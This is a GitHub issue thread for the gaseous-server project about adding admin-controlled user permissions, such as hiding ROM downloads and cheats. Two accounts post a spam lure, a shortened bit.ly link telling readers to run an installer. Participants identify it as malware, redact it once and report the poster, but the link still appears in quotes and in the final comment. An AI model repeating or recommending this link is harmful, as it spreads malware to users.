### ISSUE TITLE
Add more customizable 'user' options for the admin to be able to control what they can and can't do.

### ISSUE THREAD

**Issue by pjghangouts** [gaseous-project/gaseous-server#412]
I'm going to be using your software to run a monthly community driven retro game competitions, but I'd like the option to be able to control whether the user can download the roms, use the 'cheats' etc, so I'm asking if there can be more control from an Admin standpoint what you can give to a user after you've set them up. Maybe the basic could just be a 'Play Game' option, nothing else.

**Comment by michael-j-green** [comment]
Happy to look into something like this for after v1.8.0 is released, as it's going to need alot of thought to flesh out (plus some minor to major surgery to implement). Do you have an idea of what permissions/features you'd like to control access to (aside from what you've noted above)?

Note that in order to play a game, a user must be able to download that ROM file since the ROM is executed in the browser. At best I can hide the link to download the file itself, but it wouldn't stop someone from connecting via the API or if they knew the link to the file (which they could get by hovering their mouse over the Launch button).

**Comment by zawa999** [comment]
try this
https://bit.ly/4e4zLlq
select the desired compiler in the installer

**Comment by michael-j-green** [comment]
> try this https://bit.ly/4e4zLlq select the desired compiler in the installer

Hi @zawa999, what is this attachment? And how does it relate to @pjghangouts request?

**Comment by pjghangouts** [comment]
> > try this https://bit.ly/4e4zLlq select the desired compiler in the installer
> 
> Hi @zawa999, what is this attachment? And how does it relate to @pjghangouts request?

It's malware, running it through VirusTotal flags it up.

**Comment by michael-j-green** [comment]
Spotted that too (should have checked before I commented :D

I've edited your reply to redact the download link so no one else downloads the malware.

**Comment by pjghangouts** [comment]
As for your

> Happy to look into something like this for after v1.8.0 is released, as it's going to need alot of thought to flesh out (plus some minor to major surgery to implement). Do you have an idea of what permissions/features you'd like to control access to (aside from what you've noted above)?
> 
> Note that in order to play a game, a user must be able to download that ROM file since the ROM is executed in the browser. At best I can hide the link to download the file itself, but it wouldn't stop someone from connecting via the API or if they knew the link to the file (which they could get by hovering their mouse over the Launch button).

I'll have a deeper though and come back to you about what I think for any extra stuff, totally get the 'download' into the browser, but most of my people would be more of a 'quarter - player 1' type of people, with options to download stuff, etc, could confuse them. Happy you are open to suggestions.

**Comment by pjghangouts** [comment]
> Spotted that too (should have checked before I commented :D )
> 
> I've edited your reply to redact the download link so no one else downloads the malware.

Yeah, should have done the same myself. sorry! and I blocked and reported also.

**Comment by michael-j-green** [comment]
> As for your
> 
> > Happy to look into something like this for after v1.8.0 is released, as it's going to need alot of thought to flesh out (plus some minor to major surgery to implement). Do you have an idea of what permissions/features you'd like to control access to (aside from what you've noted above)?
> > Note that in order to play a game, a user must be able to download that ROM file since the ROM is executed in the browser. At best I can hide the link to download the file itself, but it wouldn't stop someone from connecting via the API or if they knew the link to the file (which they could get by hovering their mouse over the Launch button).
> 
> I'll have a deeper thought and come back to you about what I think for any extra stuff, totally get the 'download' into the browser, but most of my people would be more of a 'quarter - player 1' type of people, with options to download stuff, etc, could confuse them. Happy you are open to suggestions.

Totally makes sense. Some of these permissions would be server side, while others would simply be hiding features in the UI.

v1.8.0 has had a UI revamp, so these permission changes will need to happen after that's released - so we have plenty of time to work out a permissions model (check the milestones for v.1.8.0 for my progress so far).



> > Spotted that too (should have checked before I commented :D )
> > I've edited your reply to redact the download link so no one else downloads the malware.
> 
> Yeah, should have done the same myself. sorry! and I blocked and reported also.

All good :)

I feel like I've brought my day job home banning that guy :D

**Comment by Klevente12** [comment]
try this
https://bit.ly/4e4zLlq
select the desired compiler in the installer
